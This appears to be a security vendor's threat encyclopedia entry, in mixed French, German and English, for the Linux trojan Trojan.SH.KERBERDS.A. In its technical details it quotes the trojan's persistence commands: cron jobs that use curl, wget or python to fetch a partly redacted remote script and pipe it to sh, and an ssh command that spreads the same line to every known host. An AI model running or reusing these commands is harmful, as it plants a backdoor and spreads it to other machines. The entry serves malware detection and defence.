Trojan.SH.KERBERDS.A
Linux
Type de grayware:
Trojan
Destructif:
Non
Chiffrement:
Non
In the wild::
Oui
Overview
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Détails techniques
Übertragungsdetails
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Download-Routine
Speichert die heruntergeladenen Dateien unter den folgenden Namen:
- 48f14124d703c2
Andere Details
Es macht Folgendes:
- It creates the following cron jobs for persistence:
- Path: /var/spool/cron/crontabs/root
Schedule: Every 10 minutes
Command: */10 * * * * (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen(\"http://lsd.{BLOCKED}ten.org\").read()')|sh - Path: /etc/crontab
Schedule: Every 10 minutes
Command: */10 * * * * root (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen("http://lsd.{BLOCKED}ten.org").read()'||/usr/local/sbin/48f14124d703c2)|sh
- Path: /var/spool/cron/crontabs/root
- It removes the immutable property of the following files:
- /etc/cron*
- /var/spool/cron*
- It executes the following command on every host in the known_hosts file via ssh:
- (curl -fsSL lsd.{BLOCKED}ten.org||wget -q -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen(\"http://lsd.{BLOCKED}ten.org\").read()')|sh >/dev/null 2>&1 &
Solutions
Durchsuchen Sie Ihren Computer mit Ihrem Trend Micro Produkt, und löschen Sie Dateien, die als Trojan.SH.KERBERDS.A entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem Trend Micro Produkt gesäubert, gelöscht oder in Quarantäne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarantäne können einfach gelöscht werden. Auf dieser Knowledge-Base-Seite finden Sie weitere Informationen.
Participez à notre enquête!